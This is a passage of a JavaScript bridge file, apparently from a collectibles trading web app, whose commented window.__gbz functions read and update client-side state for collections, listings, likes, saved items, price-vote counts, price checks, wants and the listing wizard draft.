   those installers already built: theirs carry a real tradeCount and a real
   join date, and a comment author cannot (the comments select joins neither).
   First write wins, and the floor install always runs before any comment fetch.

   🪤 RE-ENTRANT BY CONSTRUCTION, and it has to be. Comments install lazily, once
   per listing-detail navigation, so the same author arrives again on every other
   listing they have commented on. The presence check makes the second and every
   later arrival a no-op rather than a rewrite — which is also what stops a row
   being swapped out from under a renderDetail that is holding a reference to it.

   Returns how many were ACTUALLY added, so the caller can tell a merge that
   changed something from one that had nothing new and skip a needless repaint. */
/* One newly-created collection row, into the closet the visitor is looking at.

   🔑 UNLIKE A NEW LISTING, THIS ONE IS SAFE TO SHOW, and the difference is the
   whole reason the two branches of #wz-publish end differently. POST
   /api/collections with isAvailable:false creates the row outright — no verify
   job, no under_review, a plain 201 — so by the time this runs the item really
   IS in their collection. MY_COLLECTION is also the SELLER'S OWN view; nothing
   here reaches a buyer or the public floor. Merging a new LISTING would put an
   unapproved row in front of buyers, which is why that branch does not.

   unshift, not push: his own handler puts a new item at the head (app.js:4956)
   and the closet reads in array order, so appending would bury it. */
window.__gbzMergeCollectionItem = function (item) {
  if (!item || !item.id) return false;
  for (var ci = 0; ci < MY_COLLECTION.length; ci++) {
    if (MY_COLLECTION[ci].id === item.id) return false;
  }
  MY_COLLECTION.unshift(item);
  return true;
};

/* One closet row, updated in place by its collection id or its listing id
   (lane D, card 1219177682942591): the Quick Edit pop-up saves under itself
   and the publish flip turns IN REVIEW into ACTIVE, both without a reload.
   Only the six fields a tile draws can move; a null note clears the note.
   False when no row matches, so a caller can leave it to the next load. */
window.__gbzUpdateCollectionItem = function (sel, fields) {
  if (!sel || !fields) return false;
  var hit = null;
  for (var u = 0; u < MY_COLLECTION.length; u++) {
    var cand = MY_COLLECTION[u];
    if ((sel.id && cand.id === sel.id) || (sel.lid && cand.lid === sel.lid)) { hit = cand; break; }
  }
  if (!hit) return false;
  var keys = ["title", "image", "value", "status", "chips", "note"];
  for (var k = 0; k < keys.length; k++) {
    var key = keys[k];
    if (!Object.prototype.hasOwnProperty.call(fields, key) || fields[key] === undefined) continue;
    if (key === "note" && fields[key] === null) { delete hit.note; continue; }
    hit[key] = fields[key];
  }
  return true;
};

/* collectionRemove's read (src/web/collectionRemove.ts): which record a
   "remove:" button names. The row's own id and its listing's id, copied out
   rather than the row itself, because the module picks the ROUTE from them:
   a row with a listing goes the way the app sends one, DELETE
   /api/listings/:lid, and a piece never listed goes through its collection
   row. A row the server synthesized from a listing ("listing:" plus its id)
   or the floor derived from one ("my-" plus its id) has no collection row. */
window.__gbzCollectionRow = function (id) {
  for (var q = 0; q < MY_COLLECTION.length; q++) {
    if (MY_COLLECTION[q].id === id) return { id: MY_COLLECTION[q].id, lid: MY_COLLECTION[q].lid || null };
  }
  return null;
};

/* collectionRemove's write, once the server said yes: the piece leaves the
   closet, and its cards leave the floor in every shape it had there: the
   listing itself (by its id) and its "coll-" card as a piece. Both, because a
   piece listed with List It this session carries a listing while its "coll-"
   card is still on the floor. Only cards the visitor owns: the server takes a
   listing down for its seller and no one else.

   Then, where the page repaints: Remove sits at the bottom of Edit (card
   1218941367836566), so when THIS piece is the one being edited, in Quick Edit
   (editModalFor names its listing, or its "coll-" shape) or in the full edit
   (editMoreReturn names its row, or its listing), the edit is over with the
   piece: both doors close, the draft goes with them (kept, it came back through
   + List as a CREATE of a removed item), and the page lands on your
   collection, where the tile is gone. __gbzCancelEdit is not this: it goes
   back to the door, which would be the listing page of a listing just deleted.
   The same landing when the page IS that listing's, edit or no edit: a Quick
   Edit closed while the DELETE was still out leaves the address of a listing
   the page no longer holds, and a repaint there is his route()'s fall-through
   to the home feed under a dead hash. Any other remove repaints where it was.
   Off /web (the answer landed after the visitor left for /help), the edit
   still ends but nothing navigates: WebInstall's cross-route guard swallows
   hashchange there, so a hash written onto that page would push /help#/profile
   into history and repaint nothing; the page repaints in place, hidden, and
   the message goes into the hidden toast at once. Returns "navigating" when it
   changed the hash (his render for the new route paints a FRESH toast node, so
   a message shown before that paint is wiped: collectionRemove waits for it),
   true when it repainted in place, false when the row was not on the page. */
window.__gbzRemoveCollectionRow = function (id) {
  var row = null;
  for (var q = 0; q < MY_COLLECTION.length; q++) {
    if (MY_COLLECTION[q].id === id) { row = MY_COLLECTION[q]; MY_COLLECTION.splice(q, 1); break; }
  }
  if (!row) return false;
  for (var l = LISTINGS.length - 1; l >= 0; l--) {
    var sid = LISTINGS[l].id;
    if ((sid === row.lid || sid === "coll-" + row.id) && LISTINGS[l].seller === store.me) LISTINGS.splice(l, 1);
  }
  var editingIt =
    (editModalFor && (editModalFor === row.lid || editModalFor === "coll-" + row.id)) ||
    (editMoreReturn && (editMoreReturn.cid === row.id || (row.lid && editMoreReturn.id === row.lid)));
  var onItsPage = currentHash() === "#/listing/" + row.lid || currentHash() === "#/listing/coll-" + row.id;
  var webActive = typeof window.__gbzWebActive !== "function" || window.__gbzWebActive() === true;
  if (editingIt || onItsPage) {
    editModalFor = null;
    editMoreReturn = null;
    wiz = null;
    if (webActive && currentHash() !== "#/profile") { location.hash = "#/profile"; return "navigating"; }
    if (webActive) { render(); return true; }
  }
  if (typeof rerenderKeepScroll === "function") rerenderKeepScroll();
  return true;
};


/* A PHOTO THAT WOULD NOT LOAD, for avatarFallback.ts. avatarHTML (data.js)
   decides photo-or-initials once, from whether USERS[handle].avatar is set. So
   a URL that 404s, or that the image policy refuses, painted the browser's
   broken-image glyph, and painted it again on every render. The fixup hears
   the failed load and calls this: the URL is put aside, and from then on his
   own renderer draws the initials, with nothing of ours in the way and no flash
   of the glyph on the next paint. A floor refresh installs fresh rows and
   brings the URL back; the fixup remembers what failed and calls this again.
   Returns whether the row changed. The URL is kept on the row as avatarFailed,
   so nothing is lost and a reader can see why a row has no photo. */
window.__gbzAvatarFailed = function (handle) {
  var fu = USERS[handle];
  if (!fu || !fu.avatar) return false;
  fu.avatarFailed = fu.avatar;
  fu.avatar = undefined;
  return true;
};

/* F3 (adversarial review, card 1218200003007957): PUBLIC_EXTRAS[handle]'s
   merge sibling — the SAME shape __gbzMergeCollectionItem writes into
   MY_COLLECTION (the signed-in visitor's own closet), but for SOMEONE
   ELSE'S public collection instead, which renderPublicProfile's
   collectionFor(handle) already reads as the spread of "live" (its own
   LISTINGS.filter(...) mapping) followed by PUBLIC_EXTRAS[handle] (data.js).
   This is the extension point the real fix uses rather than
   LISTINGS/__gbzMergeListing: collectionFor's "live" branch can only ever
   label a row ACTIVE or IN COLLECTION — there is no way for a merged
   LISTINGS row to render SOLD/TRADED/PENDING, the three statuses
   PUBLIC_EXTRAS rows (and only PUBLIC_EXTRAS rows) already support today.
   Pushing real rows into PUBLIC_EXTRAS instead of LISTINGS is what lets the
   Sold/Traded/Pending tabs (app.js:1516) and their card chips show true
   data without touching collectionFor()/renderPublicProfile() at all.

   Keyed by handle, not id alone: PUBLIC_EXTRAS is itself keyed by handle,
   and a null-prototype object per __gbzInstallFloor's own Trap-1-adjacent
   setup above, so a handle with no entry yet needs its array created first.
   Dedup by item.id mirrors __gbzMergeCollectionItem's own check — the
   caller (profileFixups.ts) re-fetches and re-maps this seller's collection
   on every MutationObserver pass a cache miss lets through, and a second
   merge of the same row must not double it in collectionFor(handle).

   push, not unshift: unlike MY_COLLECTION (a manual, most-recent-first
   publish flow), these rows arrive as a single batch with no "most recent"
   ordering to preserve — appended after the live listings is exactly the
   "then completed/unlisted rows" order collectionFor's own comment
   documents.

   Returns whether this row was newly added — same "did this write anything"
   convention __gbzMergeListing/__gbzSetListingComments already return a
   boolean for, so a bulk caller can skip a repaint when nothing changed. */
window.__gbzMergeCollectionExtra = function (handle, item) {
  if (!handle || !item || !item.id) return false;
  var list = PUBLIC_EXTRAS[handle];
  if (!list) { list = []; PUBLIC_EXTRAS[handle] = list; }
  for (var pe = 0; pe < list.length; pe++) {
    if (list[pe].id === item.id) return false;
  }
  list.push(item);
  return true;
};

window.__gbzMergeUsers = function (users) {
  var added = 0;
  var me = store.me;
  for (var uh in users) {
    /* 🔴 NEVER THE VISITOR THEMSELVES, and this is not defensive padding —
       without it the fix becomes a REGRESSION on their own money surface.

       GET /api/comments/:listingId has no viewer-exclusion filter, so your own
       comments come back carrying your own author row, and mapCommentAuthors
       keys by the raw username — the same value store.me holds.
       Two facts then collide:

         · __gbzInstallFloor builds USERS from mapped SELLERS only, so a
           signed-in visitor who has never listed anything has NO USERS[me].
         · __gbzInstallWallet enriches under "if (me && USERS[me])", so with no
           row it silently drops the REAL lvl/pts/ptsNext/streak/points. It runs
           once, at boot, and never runs again.

       Blake's renderProfile and renderWallet both open with
       "const u = USERS[store.me]; if (!u) return \"\";" — so today that visitor
       sees nothing there, which is honest. Create a thin row and the guard
       starts passing: the page paints "0 PTS", "Level 1 of 60", "0-day login
       streak" and a blank join date NEXT TO the real spendable balance the
       wallet fetch installed. A screen contradicting itself about someone's own
       points is worse than the "?" avatar this change exists to retire.

       And the ordinary path LOSES the race: the comments installer is
       registered before installWallet is awaited, but a visitor who lands on
       "#/" and opens a listing minutes later merges long after that install
       already skipped. Excluded here rather than in the mapper because only the
       bridge can see store. */
    if (uh === me) continue;
    if (!USERS[uh]) { USERS[uh] = users[uh]; added++; }
  }
  return added;
};

/* installPriceCheckRun's success target. Writes ONE real result onto the
   LISTINGS row in place (same reason as __gbzSetListingComments: renderDetail
   is holding that object reference) and flips Blake's own three-state pcRun
   flag to true so his reveal panel paints it.

   🔴 THE TWO WRITES ARE ONE OPERATION AND MUST STAY THAT WAY. Setting
   pcRun[id] = true WITHOUT a real priceCheck on the row is exactly how the
   fabrication renders: app.js:824 falls back to a hand-written
   {confidence:"HIGH CONFIDENCE", verdict:"PRICED FAIR", reasoning:"Comparable
   pieces cleared between …"} whenever l.priceCheck is absent, and pcRun is the
   only thing gating whether that object reaches the screen. Never split these,
   and never set the flag on a failure path. */
window.__gbzSetListingPriceCheck = function (id, priceCheck) {
  for (var pcS = 0; pcS < LISTINGS.length; pcS++) {
    if (LISTINGS[pcS].id === id) {
      LISTINGS[pcS].priceCheck = priceCheck;
      pcRun[id] = true;
      return true;
    }
  }
  return false;
};

/* The in-flight and failure halves of the same flow. 'running' true paints
   Blake's own "Checking the floor and recent comps…" state — copy that is
   TRUE while a real POST is outstanding, and was only ever false because his
   750ms setTimeout was pretending. 'running' false clears the key entirely,
   returning the pre-run button, which is the honest resting state when no
   answer exists.

   delete, not '= false': pcRun[id] === false and pcRun[id] === undefined take
   the same branch in his ternary chain, and deleting keeps the object free of
   keys that mean nothing. */
window.__gbzSetPriceCheckRunning = function (id, running) {
  if (running) pcRun[id] = "running";
  else delete pcRun[id];
};

/* The price the panel is printing, for the caller that has to derive a verdict
   against it. Mirrors __gbzThreadHandle/__gbzThreadOfferId: a read-only lookup
   into a data.js global that TypeScript cannot name. Returns null when the row
   is gone (the visitor navigated while a POST was in flight), which the caller
   treats as "nothing to paint" rather than as a zero. */
window.__gbzListingPrice = function (id) {
  for (var pcP = 0; pcP < LISTINGS.length; pcP++) {
    if (LISTINGS[pcP].id === id) return LISTINGS[pcP].declaredValue;
  }
  return null;
};

/* The two price-check fields Blake's panel has no markup for — 'grounded' and
   'sources' — read back out of the LISTINGS row for the DOM fixup that appends
   the attribution line (demoTextFixups.ts, fixPriceCheckAttribution). Same
   read-only-lookup shape as __gbzListingPrice directly above, and for the same
   reason: LISTINGS is a data.js top-level const and TypeScript cannot name it.

   Returns the whole priceCheck object rather than a pre-computed label, so the
   attribution RULE stays in TypeScript where it is unit-tested and pinned to
   mobile's copy (priceCheckAttributionLabel), instead of being duplicated into
   this untyped string. Null when the row is gone or carries no check. */
window.__gbzListingPriceCheck = function (id) {
  for (var pcA = 0; pcA < LISTINGS.length; pcA++) {
    if (LISTINGS[pcA].id === id) return LISTINGS[pcA].priceCheck || null;
  }
  return null;
};

/* Can his router resolve #/listing/<id> at all? Third of the read-only lookups
   in this file, same shape and same reason as the two directly above: LISTINGS
   is a data.js top-level const TypeScript cannot name. listingRouteFallback.ts
   is the caller, and its header has the full defect.

   🔴 THREE-VALUED, AND THE THIRD VALUE IS THE POINT. Null means CANNOT SAY, not
   "no": with an empty LISTINGS every id looks absent, and a caller that reads
   that as absence would redirect perfectly good listings off the demo. The two
   states that produce it are the honest ones to decline on — the floor fetch
   has not landed yet, or the floor genuinely holds nothing to compare against.
   Same posture as __gbzListingPrice's own null ("the row is gone", treated as
   nothing-to-paint rather than as a zero). */
window.__gbzHasListing = function (id) {
  if (!LISTINGS.length) return null;
  for (var hlI = 0; hlI < LISTINGS.length; hlI++) {
    if (LISTINGS[hlI].id === id) return true;
  }
  return false;
};

/* installWizardPriceCheck's read side — the create-flow draft, in the shape
   mobile's usePriceCheck takes.

   'wiz' is a top-level 'let' in app.js (app.js:1470) holding the whole
   in-progress listing, and like LISTINGS/USERS it is a lexical binding
   TypeScript cannot name — hence a bridge accessor rather than a window read.
   Null before the wizard is opened, which the caller treats as "no draft to
   check" rather than as an empty one.

   🔑 THE FIELD NAMES ARE MOBILE'S, NOT BLAKE'S, and the mapping is the whole
   value of doing it here: 'wiz.cat' -> category, 'wiz.value' (a string off a
   text input) -> declaredValue as a Number. Mobile's create screen sends
   {title, description, category, declaredValue, condition, brand} with NO
   listingId, because nothing has been published yet — see
   mobile/app/(tabs)/create.tsx:1006. Sending a listingId here would ask the
   server to resolve fields off a row that does not exist.

   Blake's condition codes are the same vocabulary (data.js:147 —
   new|like_new|good|fair|poor), so they pass through unmapped. */
/* The draft's IDENTITY, not its contents.

   installWizardPriceCheck holds a rendered answer, and an answer is only valid
   for the draft it answered. freshWiz() mints a NEW object for every listing
   (app.js:1470 + freshWiz), so reference identity is Blake's own signal for
   "this is a different item" — and it is the one signal that survives a seller
   starting a second listing with the same title, where comparing fields alone
   would keep the first item's band on screen.

   Returned raw and only ever ===-compared; nothing reads through it. */
window.__gbzWizardRef = function () {
  return wiz || null;
};

/* The whole draft, flattened for the publish interceptor.

   __gbzWizardDraft above deliberately exposes only the fields the PRICE
   CHECK needs (six, plus the slab's graded flag, grader and grade), in mobile's field
   names. Publishing needs all of it, in HIS names, so this is a second accessor rather than a widening of that one —
   they answer different questions and their callers must not drift together.

   🔑 THREE THINGS ONLY THE BRIDGE CAN DO, which is why they happen here:
     · tradeForSel is a Set. Structured-cloning it across the boundary is needless;
       reading which of the item's own Trade for entries are picked is one line
       HERE and impossible in TypeScript, because wiz is an app.js top-level let declaration.
     · photos is copied, not referenced. The interceptor holds it across an
       await while the visitor can still add or remove photos; a live array
       would let the payload change under the upload loop.
     · editMoreReturn is the EDIT-INTENT DISCRIMINATOR and it is not on wiz at
       all. app.js's "Edit listing" path (#editl-more) calls freshWiz(), prefills
       it from a REAL published listing, and sends the visitor to #/list — a
       draft indistinguishable from a create draft by the time it reaches
       #wz-publish. Publishing one mints a DUPLICATE of the seller's own live
       listing. This flag is the only thing in the runtime that knows, so it
       rides along, and the interceptor saves through the update routes when it
       is set (wizardPublish.ts saveEdit), never the create. */
/* THE COMMENTS MODAL'S SUBJECT, for commentPost.ts.

   The inline card composer carries its listing id in the markup
   (data-takesend / data-takefor), so an interceptor can read it off the
   element. The MODAL composer does not: #cm-send and #cm-in are bare ids, and
   the listing they belong to lives in "commentsFor" (app.js:208), a top-level
   "let" set when a [data-comments] control opens the modal (app.js:4302).

   A top-level "let" is a lexical binding, NOT a window property, which is the
   same reason this bridge has to exist for LISTINGS and wiz. Without this
   accessor the modal's Post button cannot be wired at all: there is no way to
   learn which listing the open modal is about.

   Returns null when the modal is closed, which is also the honest answer for a
   click that somehow arrives with no modal open. */
/* THE PRICE VOTE, for listingVotes.ts.

   Two things live in different places and have to move together: the
   VIEWER'S OWN vote in store.votes[id] (data.js:800, a top-level const so it
   is lexical and unreachable from a module), and the row's CACHED COUNTS in
   LISTINGS[i].fairVotes / .overVotes.

   His renderers add the two (app.js:187): fair = l.fairVotes + (mine ? 1 : 0).
   So setting the vote alone is enough for every ordinary transition, and the
   deltas exist for the one case where the baseline ALREADY counts the viewer
   -- a vote cast on a previous visit, which the list route does not report.
   See listingVotes.ts's header for the full arithmetic.

   vote === null clears it, which is the unvote the owner asked for. */
/* THE ACCOUNT FORM'S CHIP STATE, for accountSettings.ts.

   His chip handlers (app.js:5161-5173) write straight into ACCOUNT: cats and
   vibes are arrays he splices, clothing is a scalar. ACCOUNT is a top-level
   const in app.js, so a module cannot read it without this.

   The TEXT inputs are deliberately NOT included -- accountSettings reads
   those from the DOM, where defaultValue vs value tells it which ones the
   person actually edited. That distinction is what keeps a taken username
   from failing a save of the sizes and categories.

   Copies rather than handing out the live arrays: a caller that spliced one
   would be editing his render state from outside, and this is a read. */
window.__gbzAccountDraft = function () {
  if (!ACCOUNT) return null;
  return {
    email: (ACCOUNT.identity && ACCOUNT.identity.email) || '',
    cats: (ACCOUNT.cats || []).slice(),
    vibes: (ACCOUNT.vibes || []).slice(),
    clothing: ACCOUNT.clothing || ''
  };
};
window.__gbzSetListingVote = function (id, vote, fairDelta, overDelta) {
  if (vote === null || vote === undefined) { delete store.votes[id]; }
  else { store.votes[id] = vote; }
  for (var vi = 0; vi < LISTINGS.length; vi++) {
    if (LISTINGS[vi].id !== id) continue;
    if (fairDelta) {
      LISTINGS[vi].fairVotes = Math.max(0, (LISTINGS[vi].fairVotes || 0) + fairDelta);
    }
    if (overDelta) {
      LISTINGS[vi].overVotes = Math.max(0, (LISTINGS[vi].overVotes || 0) + overDelta);
    }
    return true;
  }
  return false;
};

/* The viewer's current vote, so the interceptor can tell a SWITCH from an
   UNVOTE. Same lexical-binding reason as everything else in this bridge. */
window.__gbzListingVote = function (id) {
  return store.votes[id] || null;
};

/* THE LIKE COUNT, for listingLikes.ts. Both like routes answer with the
   authoritative total (POST /api/listings/:id/like and DELETE
   /api/users/me/likes/:id both send { ok, liked, likes }), so this SETS rather
   than nudging -- there is no arithmetic to get wrong and no baseline to
   reconcile. __gbzLikedMap carries the viewer's own state, which his markup has
   no field for at all.

   The likes argument may be null: the caller had no honest number (an older body with no
   total, over a row whose count could not be read). The viewer's state still
   moves; the row's count is left as it is, because a made-up 0 written here
   would surface on his next paint. */
window.__gbzSetListingLike = function (id, likes, liked) {
  window.__gbzLikedMap = window.__gbzLikedMap || {};
  if (liked) { window.__gbzLikedMap[id] = true; } else { delete window.__gbzLikedMap[id]; }
  for (var li = 0; li < LISTINGS.length; li++) {
    if (LISTINGS[li].id !== id) continue;
    if (typeof likes === "number") LISTINGS[li].likes = likes;
    return true;
  }
  return false;
};

/* The listing's CURRENT like count.

   Needed only as the fallback. Both routes answer with the authoritative
   total now, and the caller takes it. For a body that carries no total, the
   count is derived from this reader, and the caller mirrors the server's own
   arithmetic exactly (plus one on a like; GREATEST(likes - 1, 0) on an unlike,
   users.ts) rather than inventing a second rule. Null when the row is not
   installed or its count is not a number, so the caller can refuse to guess
   instead of painting a number it made up. */
window.__gbzListingLikes = function (id) {
  for (var ki = 0; ki < LISTINGS.length; ki++) {
    if (LISTINGS[ki].id === id) {
      return typeof LISTINGS[ki].likes === "number" ? LISTINGS[ki].likes : null;
    }
  }
  return null;
};

/* Seed the viewer's liked set from GET /api/users/me/likes.

   One call answers the whole viewer, which is a better position than follow
   (one status request per button). Replaces the map wholesale rather than
   merging: the endpoint IS the truth, and a merge would keep a stale like
   alive after it was removed on another device. */
window.__gbzSeedLikedMap = function (ids) {
  var map = {};
  for (var si = 0; si < ids.length; si++) map[ids[si]] = true;
  window.__gbzLikedMap = map;
  return ids.length;
};

/* Whether the viewer has liked this listing THIS SESSION. Blake has no such
   state -- his heart is a display span -- so the bridge owns the map. */
window.__gbzListingLiked = function (id) {
  return !!(window.__gbzLikedMap && window.__gbzLikedMap[id]);
};

/* THE SAVED SET, for savedListings.ts -- and unlike the like map above,
   there is no shadow to keep: SAVED is a real Set his own data.js declares,
   and renderCard/the profile grid already read it directly. This bridge
   writes the REAL SAVED, in place, rather than inventing a second one. */
window.__gbzSetListingSaved = function (id, saved) {
  if (saved) { SAVED.add(id); } else { SAVED.delete(id); }
};
window.__gbzListingSaved = function (id) {
  return SAVED.has(id);
};
/* Seed from GET /api/favorites. Cleared first, same "the endpoint IS the
   truth" replace-wholesale rule __gbzSeedLikedMap uses -- though in practice
   SAVED already arrives empty here, cleared once by __gbzInstallFloor above
   before this ever runs. */
window.__gbzSeedSavedMap = function (ids) {
  SAVED.clear();
  for (var sv = 0; sv < ids.length; sv++) SAVED.add(ids[sv]);
  return ids.length;
};

window.__gbzCommentsFor = function () {
  return commentsFor || null;
};
/* The ONE write the scan installer makes back into app.js.

   wizardScan.ts owns the network and knows nothing about rendering; this hands
   it the single state slot the Photos step paints from, then repaints. It
   reaches app.js's \`wzScan\` local exactly as __gbzWizardPublishDraft below
   reaches \`wiz\` — this bridge is injected into that scope, which is the only
   reason either can. */
/* 🪤 DECLARED HERE, INSIDE THE INSTALL FUNCTION, AND NOT LEFT IMPLICIT.
   An undeclared assignment would make wzScanApplied a FREE VARIABLE of this
   bridge, and demoContract derives its bridge-global anchor list by extracting
   exactly those — so it would start demanding that app.js declare a top-level
   \`wzScanApplied\`, which app.js has no reason to own. The flag belongs to the
   bridge because the latch belongs to the bridge. */
var wzScanApplied = false;
window.__gbzSetWizardScanState = function (s) {
  /* THE SUGGESTION IS APPLIED ONCE PER RUN, AND "once" MEANS ONCE
     SUCCESSFULLY.

     🔴 THIS USED TO LATCH ON THE PHASE TRANSITION — \`!wasDone\`, where wasDone
     was simply \`wzScan.phase === "done"\`. applyScanSuggestion refuses to write
     unless the scanned photo is STILL the cover, and that refusal is correct:
     an answer about one item must never fill in the form for another. But the
     old latch could not tell a refusal from a success, so a scan that landed
     while the cover happened to be somebody else was discarded permanently.

     Nothing could reach that before. ✕ and Crop destroy a photo, so neither
     can restore a previous one to position 0 — the ownership test could fail
     but never un-fail. Drag-to-reorder (card 1218433791928766) is the first
     operation that can, so a seller could move a photo, have their result
     arrive while it was moved, move it back, and be looking at "Scan complete"
     above an empty form with no route to the answer except paying for it
     again.

     So the flag now records whether the suggestion was APPLIED. A refused run
     stays eligible; a run that got its chance never asks twice, which is what
     keeps a field the seller deliberately CLEARED from being refilled by the
     next repaint of the same done state. */
  var appliedAlready = wzScanApplied;
  var sameRun = wzScan && s && wzScan.photo === s.photo;
  if (!sameRun) wzScanApplied = false;
  wzScan = s || null;
  if (s && s.phase === "done" && !(sameRun && appliedAlready)) {
    if (applyScanSuggestion(s.suggestion, s.photo)) wzScanApplied = true;
  }
  /* window.rerenderKeepScroll, not the bare name. It is a top-level FUNCTION
     declaration in app.js, so unlike wiz and wzScan (both top-level lets) it
     does land on the global object — which is how every other repaint in this
     bridge already reaches it, and one fewer free variable to pin in
     demoContract's anchor list. */
  if (typeof window.rerenderKeepScroll === "function") window.rerenderKeepScroll();
};
/* The want pop-up, for wantsWrite.ts (PR B). The draft and the checks live in app.js so the
   demo and the installed site refuse the same drafts with the same words; the commit is the
   page's own half (the entry on the item, the pop-up closed), the server's half is the module's. */
/* Numbers each pop-up at its first Save, so a request's late answer can act on the pop-up it came
   from and never on one opened since. */
var wantModalSeq = 0;
window.__gbzWantDraft = function () {
  if (!wantModal || !wantModal.draft) return null;
  var d = wantModal.draft;
  if (typeof wantModal.token !== "number") wantModal.token = ++wantModalSeq;
  return { from: wantModal.from || null, addToProfile: !!d.addToProfile, draft: Object.assign({}, d), fields: wantFieldsFor(d.sub || d.cat), token: wantModal.token };
};
window.__gbzWantDraftError = function () { return wantModal && wantModal.draft ? wantDraftError(wantModal.draft, wantModal.from) : null; };
/* With a token, only the pop-up the request came from shows the message; a pop-up opened since
   never inherits another request's refusal. Clears that pop-up's Saving state. */
window.__gbzWantShowError = function (message, token) {
  if (!wantModal) return false;
  if (typeof token === "number" && wantModal.token !== token) return false;
  wantModal.busy = false; wantModal.err = String(message || ""); rerenderKeepScroll(); return true;
};
window.__gbzWantBusy = function (busy, token) {
  if (!wantModal) return;
  if (typeof token === "number" && wantModal.token !== token) return;
  wantModal.busy = !!busy; rerenderKeepScroll();
};
/* Whether the entry is still on the wizard's item and picked: the chip may have been tapped off,
   or the wizard left, while a request was out. */
window.__gbzWantOnItem = function (label) {
  if (!wiz || !Array.isArray(wiz.tradeFor)) return false;
  /* The same entry in another letter case is the same entry (commitWantToItem keeps one). */
  var want = String(label).toLowerCase();
  for (var oi = 0; oi < wiz.tradeFor.length; oi++) { if (String(wiz.tradeFor[oi]).toLowerCase() === want) return !!(wiz.tradeForSel && wiz.tradeForSel.has(oi)); }
  return false;
};
window.__gbzWantCommit = function (opts) {
  if (!wantModal || !wantModal.draft) return null;
  var mine = !opts || typeof opts.token !== "number" || wantModal.token === opts.token;
  var label = mine ? wantLabelFor(wantModal.draft) : null;
  /* No listing to add it to: the wizard was left under the pop-up. Nothing is committed and the
     caller hears null, so no toast claims what did not happen. */
  if (opts && opts.item && !wiz) label = null;
  else if (opts && opts.item && mine) commitWantToItem(label);
  if (mine && (!opts || opts.close !== false)) { wantModal = null; rerenderKeepScroll(); }
  return label;
};
/* The same want: category, subcategory, name, and what narrows it (condition, grade, sealed, the
   clothing sizes), each read only where the category has it, as the pop-up sends them, so a grade
   typed under Trading Cards and carried in the draft into Watches does not make the same watch a
   different want. Numbers compare as numbers ("9.0" is 9, "032" is 32; a grade of 0 is none,
   the way a server row without one reads). The pop-up refuses a grade that is not a number and a
   size that is not a whole number, so the key and the request body agree. A different grade or
   size of the same item is its own want. */
var wantKey = function (w) {
  var wf = wantFieldsFor(w.sub || w.cat);
  var num = function (x) { var t = String(x == null ? "" : x).trim(); var n = Number(t); return t && isFinite(n) ? String(n) : t; };
  return [w.cat, w.sub, String(w.name || "").trim().toLowerCase(),
    wf.noCondition ? "" : (w.cond || "Any"),
    wf.graded && w.graded ? "g" : "", wf.graded && w.graded && Number(w.minGrade) > 0 ? num(w.minGrade) : "",
    wf.shirt ? (w.shirt || "") : "", wf.shirt ? num(w.waist) : "", wf.shirt ? num(w.inseam) : "",
    wf.sealed && w.sealed ? "s" : ""].map(function (x) { return String(x == null ? "" : x); }).join("|");
};
window.__gbzWantKey = function () { return wantModal && wantModal.draft ? wantKey(wantModal.draft) : null; };
/* Whether a row with that key is on the page's list: after a re-read, whether a save the server
   never answered went through. */
window.__gbzWantOnList = function (key) {
  for (var li = 0; li < myLookingFor.length; li++) { if (myLookingFor[li] && wantKey(myLookingFor[li]) === key) return true; }
  return false;
};
window.__gbzWantDuplicate = function () {
  if (!wantModal || !wantModal.draft) return false;
  var mine = wantKey(wantModal.draft);
  for (var di = 0; di < myLookingFor.length; di++) { var dw = myLookingFor[di]; if (dw && wantKey(dw) === mine) return true; }
  return false;
};
/* The created row appended to the page's list when the re-read after a save fails: the same
   install as a full rebuild, over the rows the page already holds. */
window.__gbzWantAppend = function (w) {
  if (!w) return myLookingFor.length;
  /* Already on the page (a later read carried it): no second chip with the same id. */
  if (w.id) { for (var ai = 0; ai < myLookingFor.length; ai++) { if (myLookingFor[ai] && myLookingFor[ai].id === w.id) return myLookingFor.length; } }
  return window.__gbzInstallWants(myLookingFor.concat([w]));
};
window.__gbzWantAt = function (index) { var w = myLookingFor[index]; return w ? { id: typeof w.id === "string" ? w.id : undefined } : null; };
window.__gbzWantRemoveLocal = function (index) { if (index >= 0 && index < myLookingFor.length) { myLookingFor.splice(index, 1); rerenderKeepScroll(); } };
/* By the server's id, not by index: a ✕ on another want while a delete was out may have moved it. */
window.__gbzWantRemoveById = function (id) {
  for (var ri = 0; ri < myLookingFor.length; ri++) { if (myLookingFor[ri] && myLookingFor[ri].id === id) { myLookingFor.splice(ri, 1); rerenderKeepScroll(); return true; } }
  return false;
};

window.__gbzWizardPublishDraft = function () {
  if (!wiz) return null;
  /* step rides along for the SUBCATEGORY GATE. His step-1 check omits wiz.sub
     in both places that compute it (the rendered canNext, and wizNextCheck on
     every input), so a seller can walk to step 5 with a draft the listing route
     will refuse. The gate needs to know which step the click came from. */
  /* The item's own Trade for entries the seller left picked (seeded from the stored column,
     added through the pop-up). PR B. */
  var tfo = [];
  var only = Array.isArray(wiz.tradeFor) ? wiz.tradeFor : [];
  for (var ti = 0; ti < only.length; ti++) {
    if (wiz.tradeForSel && wiz.tradeForSel.has(ti) && typeof only[ti] === "string" && only[ti]) tfo.push(only[ti]);
  }
  /* 🔴 CONFIRMED VALUES, NEVER RAW. A field the SCAN filled and the seller
     has not confirmed is not live (Nick's ruling, card 1218200292681983) and
     must not reach the wire. Reading wiz.* directly here is exactly the miss
     mobile paid for — "guarding payload sites one at a time missed
     addCollectionItem entirely" — so both draft readers in this file go
     through app.js's single wizConfirmed instead. */
  var cfm = wizConfirmed(wiz);
  return {
    title: String(cfm.title || ""),
    description: String(wiz.description || ""),
    cat: wiz.cat || null,
    sub: cfm.sub || null,
    attr: wiz.attr || null,
    brand: String(cfm.brand || ""),
    year: String(wiz.year || ""),
    condition: cfm.condition || null,
    value: String(cfm.value || ""),
    isAvailable: wiz.isAvailable !== false,
    acceptsCash: !!wiz.acceptsCash,
    acceptsItems: !!wiz.acceptsItems,
    acceptsHybrid: !!wiz.acceptsHybrid,
    grader: wiz.grader || null,
    grade: wiz.grade || null,
    cert: String(wiz.cert || ""),
    weightLb: wiz.weightLb,
    weightOz: wiz.weightOz,
    dimL: String(wiz.dimL || ""),
    dimW: String(wiz.dimW || ""),
    dimH: String(wiz.dimH || ""),
    photos: (wiz.photos || []).slice(),
    tradeFor: tfo,
    step: typeof wiz.step === "number" ? wiz.step : 0,
    isEdit: editMoreReturn !== null && editMoreReturn !== undefined,
    /* THE EDIT CONTRACT (card 1217916966128774). Which record the draft edits,
       what its availability was, and whether the install layer finished
       seeding it from the server. A publish that reads editSeeded false must
